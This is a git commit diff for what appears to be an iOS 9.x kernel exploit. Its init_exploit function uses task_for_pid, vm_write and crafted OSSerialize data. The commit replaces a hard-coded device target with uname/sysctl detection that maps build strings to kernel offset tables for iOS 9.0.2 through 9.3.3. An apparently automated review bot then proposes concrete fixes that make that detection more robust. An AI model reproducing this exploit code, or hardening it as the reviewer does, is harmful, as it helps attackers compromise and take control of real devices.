fix offset detection
parent
2e91ec1495
commit
981b527692
|
@ -22,6 +22,8 @@
|
||||||
#include <netinet/in.h>
|
#include <netinet/in.h>
|
||||||
#include <arpa/inet.h>
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
#include <sys/utsname.h>
|
||||||
|
|
||||||
#include <mach/mach.h>
|
#include <mach/mach.h>
|
||||||
|
|
||||||
#include <IOKit/IOKitLib.h>
|
#include <IOKit/IOKitLib.h>
|
||||||
|
@ -3614,9 +3616,8 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
|
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
|
||||||
DLSYM_FUNC(getuid, libsystem, uid_t);
|
DLSYM_FUNC(getuid, libsystem, uid_t);
|
||||||
|
|
||||||
DLSYM_FUNC(posix_spawn, libsystem, int, pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]);
|
DLSYM_FUNC(uname, libsystem, int, struct utsname *buf);
|
||||||
DLSYM_FUNC(system, libsystem, int, char*);
|
DLSYM_FUNC(sysctl, libsystem, int, int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, size_t newlen);
|
||||||
DLSYM_FUNC(waitpid, libsystem, pid_t, pid_t pid, int *status, int options);
|
|
||||||
|
|
||||||
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
|
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
|
||||||
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
|
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
|
||||||
|
@ -3630,8 +3631,48 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
DLSYM_FUNC(unlink, libsystem, int, const char* file);
|
DLSYM_FUNC(unlink, libsystem, int, const char* file);
|
||||||
|
|
||||||
// Init
|
// Init
|
||||||
/*// TODO fix*/
|
struct utsname systeminfo;
|
||||||
target_environment = info_to_target_environment("iPhone5,3", "9.3.2");
|
uname_func(&systeminfo);
|
||||||
|
|
||||||
|
debug_print("Found device: %s\n", systeminfo.machine);
|
||||||
|
|
||||||
|
char osname[32];
|
||||||
|
size_t s = sizeof(osname);
|
||||||
|
int cmd[2] = { CTL_KERN, KERN_OSVERSION };
|
||||||
|
if(sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0) {
|
||||||
|
debug_print("%s\n", "Could not detect device version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
bool pre91 = false;
|
||||||
|
const char* osversion = 0;
|
||||||
|
debug_print("Found version: %s\n", osname);
|
||||||
|
if (osname[2] == 'A') {
|
||||||
|
osversion = "9.0.2";
|
||||||
|
pre91 = true;
|
||||||
|
} else if (osname[2] == 'B') {
|
||||||
|
osversion = "9.1";
|
||||||
|
} else if (osname[2] == 'C') {
|
||||||
|
osversion = "9.2";
|
||||||
|
} else if (osname[2] == 'D') {
|
||||||
|
osversion = "9.2.1";
|
||||||
|
} else if (osname[2] == 'E') {
|
||||||
|
osversion = "9.3";
|
||||||
|
} else if (osname[2] == 'F') {
|
||||||
|
osversion = "9.3.2";
|
||||||
|
} else if (osname[2] == 'G') {
|
||||||
|
osversion = "9.3.3";
|
||||||
|
} else {
|
||||||
|
debug_print("%s\n", "Unsupported version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
debug_print("Guessed version for offsets: %s\n", osversion);
|
||||||
|
target_environment = info_to_target_environment(systeminfo.machine, osversion);
|
||||||
|
if (!target_environment) {
|
||||||
|
debug_print("%s\n", "Unsupported version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
const char *lock_last_path_component = "/tmp/lock";
|
const char *lock_last_path_component = "/tmp/lock";
|
||||||
char *home = getenv_func("HOME");
|
char *home = getenv_func("HOME");
|
||||||
|
@ -3740,7 +3781,6 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
|
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
|
||||||
bufpos = sizeof(kOSSerializeBinarySignature);
|
bufpos = sizeof(kOSSerializeBinarySignature);
|
||||||
|
|
||||||
bool pre91 = false;
|
|
||||||
|
|
||||||
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
|
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
|
||||||
if (pre91)
|
if (pre91)
|
||||||
|
|
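Review bot: In the second hunk of init_exploit, the new detection path reads `systeminfo.machine` and `osname[2]` without first confirming that either lookup actually produced data: the return value of `uname_func(&systeminfo)` is discarded, and the `sysctl_func` guard only checks for a non-zero return, so a reply shorter than three bytes (`s < 3`) leaves `osname[2]` as an uninitialized stack read that then selects an offset table. Both are cheap to close: `if (uname_func(&systeminfo) != 0) { debug_print("%s\n", "Could not detect device model"); return; }` before the first debug_print, and `if (sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0 || s < 3) {` in place of the existing guard. Separately, the `switch`-like chain keys only on the third character of the build string and never compares the leading characters, so (as far as can be told from the hunk) a build from a different major release that happens to share that letter would be mapped to a 9.x version and the code would proceed with mismatched offsets instead of taking the existing "Unsupported version" exit; a short comment stating which build-string prefix the table is valid for, e.g. `/* build strings are expected to be of the form 13X... — only the letter after the major number is examined */`, would at least make that assumption explicit. The enclosing function starts and ends outside the visible hunks.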